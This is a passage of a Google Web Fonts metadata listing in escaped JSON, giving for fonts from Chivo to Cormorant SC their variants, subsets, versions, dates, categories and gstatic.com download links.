\"http://fonts.gstatic.com/s/chivo/v18/va9Z4kzIxd1KFrBtW-13ZHhT-jDqdFxY1GrWN33AiasJ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/chivo/v18/va9Z4kzIxd1KFrBtW-13ZHhT-jDqdFwG1GrWN33AiasJ.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/chivo/v18/va9Z4kzIxd1KFrBtW-13ZHhT-jDqdFw01GrWN33AiasJ.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/chivo/v18/va9Z4kzIxd1KFrBtW-13ZHhT-jDqdFzY02rWN33AiasJ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/chivo/v18/va9Z4kzIxd1KFrBtW-13ZHhT-jDqdFzh02rWN33AiasJ.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/chivo/v18/va9Z4kzIxd1KFrBtW-13ZHhT-jDqdFyG02rWN33AiasJ.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/chivo/v18/va9Z4kzIxd1KFrBtW-13ZHhT-jDqdFyv02rWN33AiasJ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chivo Mono\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/chivomono/v4/mFThWbgRxKvF_Z5eQMO9qRMrJJrnKNtC3D7hrqfVKphL03l4.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/chivomono/v4/mFThWbgRxKvF_Z5eQMO9qRMrJJrnKNtC3D5hr6fVKphL03l4.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/chivomono/v4/mFThWbgRxKvF_Z5eQMO9qRMrJJrnKNtC3D6_r6fVKphL03l4.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/chivomono/v4/mFThWbgRxKvF_Z5eQMO9qRMrJJrnKNtC3D7hr6fVKphL03l4.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/chivomono/v4/mFThWbgRxKvF_Z5eQMO9qRMrJJrnKNtC3D7Tr6fVKphL03l4.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/chivomono/v4/mFThWbgRxKvF_Z5eQMO9qRMrJJrnKNtC3D4_qKfVKphL03l4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/chivomono/v4/mFThWbgRxKvF_Z5eQMO9qRMrJJrnKNtC3D4GqKfVKphL03l4.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/chivomono/v4/mFThWbgRxKvF_Z5eQMO9qRMrJJrnKNtC3D5hqKfVKphL03l4.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/chivomono/v4/mFThWbgRxKvF_Z5eQMO9qRMrJJrnKNtC3D5IqKfVKphL03l4.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/chivomono/v4/mFTjWbgRxKvF_Z5eQMO9gxoZ20KOQ0Hs2ysp7E-XIJxp1ml4imo.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/chivomono/v4/mFTjWbgRxKvF_Z5eQMO9gxoZ20KOQ0Hs2ysp7M-WIJxp1ml4imo.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/chivomono/v4/mFTjWbgRxKvF_Z5eQMO9gxoZ20KOQ0Hs2ysp7BGWIJxp1ml4imo.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/chivomono/v4/mFTjWbgRxKvF_Z5eQMO9gxoZ20KOQ0Hs2ysp7E-WIJxp1ml4imo.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/chivomono/v4/mFTjWbgRxKvF_Z5eQMO9gxoZ20KOQ0Hs2ysp7H2WIJxp1ml4imo.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/chivomono/v4/mFTjWbgRxKvF_Z5eQMO9gxoZ20KOQ0Hs2ysp7JGRIJxp1ml4imo.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/chivomono/v4/mFTjWbgRxKvF_Z5eQMO9gxoZ20KOQ0Hs2ysp7KiRIJxp1ml4imo.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/chivomono/v4/mFTjWbgRxKvF_Z5eQMO9gxoZ20KOQ0Hs2ysp7M-RIJxp1ml4imo.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/chivomono/v4/mFTjWbgRxKvF_Z5eQMO9gxoZ20KOQ0Hs2ysp7OaRIJxp1ml4imo.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chonburi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/chonburi/v10/8AtqGs-wOpGRTBq66IWaFr3biAfZ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cinzel\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-tbnTYrvDE5ZdqU.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-uTnTYrvDE5ZdqU.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-gjgTYrvDE5ZdqU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-jHgTYrvDE5ZdqU.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-lbgTYrvDE5ZdqU.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-n_gTYrvDE5ZdqU.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cinzel Decorative\",\n      \"variants\": [\n        \"regular\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cinzeldecorative/v14/daaCSScvJGqLYhG8nNt8KPPswUAPnh7URs1LaCyC.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cinzeldecorative/v14/daaHSScvJGqLYhG8nNt8KPPswUAPniZoaelDQzCLlQXE.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/cinzeldecorative/v14/daaHSScvJGqLYhG8nNt8KPPswUAPniZQa-lDQzCLlQXE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Clicker Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/clickerscript/v13/raxkHiKPvt8CMH6ZWP8PdlEq72rY2zqUKafv.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Coda\",\n      \"variants\": [\n        \"regular\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/coda/v21/SLXHc1jY5nQ8JUIMapaN39I.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/coda/v21/SLXIc1jY5nQ8HeIgTp6mw9t1cX8.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Coda Caption\",\n      \"variants\": [\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"800\": \"http://fonts.gstatic.com/s/codacaption/v19/ieVm2YRII2GMY7SyXSoDRiQGqcx6x_-fACIgaw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Codystar\",\n      \"variants\": [\n        \"300\",\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/codystar/v15/FwZf7-Q1xVk-40qxOuYsyuyrj0e29bfC.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/codystar/v15/FwZY7-Q1xVk-40qxOt6A4sijpFu_.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Coiny\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/coiny/v16/gyByhwU1K989PXwbElSvO5Tc.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Combo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/combo/v21/BXRlvF3Jh_fIhg0iBu9y8Hf0.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Comfortaa\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v40\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/comfortaa/v40/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4TbMPrQVIT9c2c8.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/comfortaa/v40/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4WjMPrQVIT9c2c8.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/comfortaa/v40/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4VrMPrQVIT9c2c8.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/comfortaa/v40/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4bbLPrQVIT9c2c8.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/comfortaa/v40/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4Y_LPrQVIT9c2c8.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Comforter\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/comforter/v5/H4clBXOCl8nQnlaql3Qa6JG8iqeuag.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Comforter Brush\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/comforterbrush/v5/Y4GTYa1xVSggrfzZI5WMjxRaOz0jwLL9Th8YYA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Comic Neue\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/comicneue/v8/4UaErEJDsxBrF37olUeD_wHLwpteLwtHJlc.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/comicneue/v8/4UaarEJDsxBrF37olUeD96_RTplUKylCNlcw_Q.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/comicneue/v8/4UaHrEJDsxBrF37olUeDx63j5pN1MwI.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/comicneue/v8/4UaFrEJDsxBrF37olUeD96_p4rFwIwJePw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/comicneue/v8/4UaErEJDsxBrF37olUeD_xHMwpteLwtHJlc.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/comicneue/v8/4UaarEJDsxBrF37olUeD96_RXp5UKylCNlcw_Q.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Coming Soon\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/comingsoon/v19/qWcuB6mzpYL7AJ2VfdQR1u-SUjjzsykh.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Commissioner\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Ni-IO9pOXuRoaY.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Fi_IO9pOXuRoaY.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Ia_IO9pOXuRoaY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Ni_IO9pOXuRoaY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Oq_IO9pOXuRoaY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Aa4IO9pOXuRoaY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5D-4IO9pOXuRoaY.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Fi4IO9pOXuRoaY.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5HG4IO9pOXuRoaY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Concert One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/concertone/v17/VEM1Ro9xs5PjtzCu-srDqRTlhv-CuVAQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Condiment\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/condiment/v20/pONk1hggFNmwvXALyH6Sq4n4o1vyCQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Content\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"khmer\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/content/v24/zrfl0HLayePhU_AwUaDyIiL0RCg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/content/v24/zrfg0HLayePhU_AwaRzdBirfWCHvkAI.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Contrail One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/contrailone/v15/eLGbP-j_JA-kG0_Zo51noafdZUvt_c092w.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Convergence\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/convergence/v15/rax5HiePvdgXPmmMHcIPYRhasU7Q8Cad.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cookie\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cookie/v17/syky-y18lb0tSbfNlQCT9tPdpw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Copse\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/copse/v15/11hPGpDKz1rGb0djHkihUb-A.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Corben\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/corben/v19/LYjDdGzzklQtCMp9oAlEpVs3VQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/corben/v19/LYjAdGzzklQtCMpFHCZgrXArXN7HWQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Corinthia\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/corinthia/v9/wEO_EBrAnchaJyPMHE0FUfAL3EsHiA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/corinthia/v9/wEO6EBrAnchaJyPMHE097d8v1GAbgbLXQA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cormorant\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/cormorant/v18/H4c2BXOCl9bbnla_nHIA47NMUjsNbCVrFk9TQ7Rg7A2uwYs.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/cormorant/v18/H4c2BXOCl9bbnla_nHIA47NMUjsNbCVrFhFTQ7Rg7A2uwYs.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cormorant/v18/H4c2BXOCl9bbnla_nHIA47NMUjsNbCVrFiNTQ7Rg7A2uwYs.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cormorant/v18/H4c2BXOCl9bbnla_nHIA47NMUjsNbCVrFs9UQ7Rg7A2uwYs.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cormorant/v18/H4c2BXOCl9bbnla_nHIA47NMUjsNbCVrFvZUQ7Rg7A2uwYs.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/cormorant/v18/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQ9fdq6C-r0YvxdA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/cormorant/v18/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQq_dq6C-r0YvxdA.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/cormorant/v18/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQmfdq6C-r0YvxdA.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/cormorant/v18/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQdfBq6C-r0YvxdA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/cormorant/v18/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQTPBq6C-r0YvxdA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cormorant Garamond\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQAllvuQWJ5heb_w.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEPjuw-NxBKL_y94.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3bmX5slCNuHLi8bLeY9MK7whWMhyjornFLsS6V7w.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3ZmX5slCNuHLi8bLeY9MK7whWMhyjYrHtPkyuF7w6C.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQWlhvuQWJ5heb_w.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEO7ug-NxBKL_y94.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQdl9vuQWJ5heb_w.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEOXvQ-NxBKL_y94.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQEl5vuQWJ5heb_w.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEPzvA-NxBKL_y94.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cormorant Infant\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyIU44g9vKiM1sORYSiWeAsLN9951w3_DMrQqcdJrk.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyKU44g9vKiM1sORYSiWeAsLN997_ItcDEhRoUYNrn_Ig.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyPU44g9vKiM1sORYSiWeAsLN993_Af2DsAXq4.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyJU44g9vKiM1sORYSiWeAsLN997_IV3BkFTq4EPw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyIU44g9vKiM1sORYSiWeAsLN995wQ2_DMrQqcdJrk.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyKU44g9vKiM1sORYSiWeAsLN997_ItKDAhRoUYNrn_Ig.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyIU44g9vKiM1sORYSiWeAsLN995ygx_DMrQqcdJrk.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyKU44g9vKiM1sORYSiWeAsLN997_ItBDchRoUYNrn_Ig.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyIU44g9vKiM1sORYSiWeAsLN9950ww_DMrQqcdJrk.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyKU44g9vKiM1sORYSiWeAsLN997_ItYDYhRoUYNrn_Ig.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cormorant SC\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/cormorantsc/v17/0ybmGD4kxqXBmOVLG30OGwsmABIU_R3y8DOWGA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/cormorantsc/v17/0yb5GD4kxqXBmOVLG30OGwserDow9Tbu-Q.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cormorantsc/v17/0ybmGD4kxqXBmOVLG30OGwsmWBMU_R3y8DOWGA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cormorantsc/v17/0ybmGD4kxqXBmOVLG30OGwsmdBQU_R3y8DOWGA.ttf\",\n        \"700\": 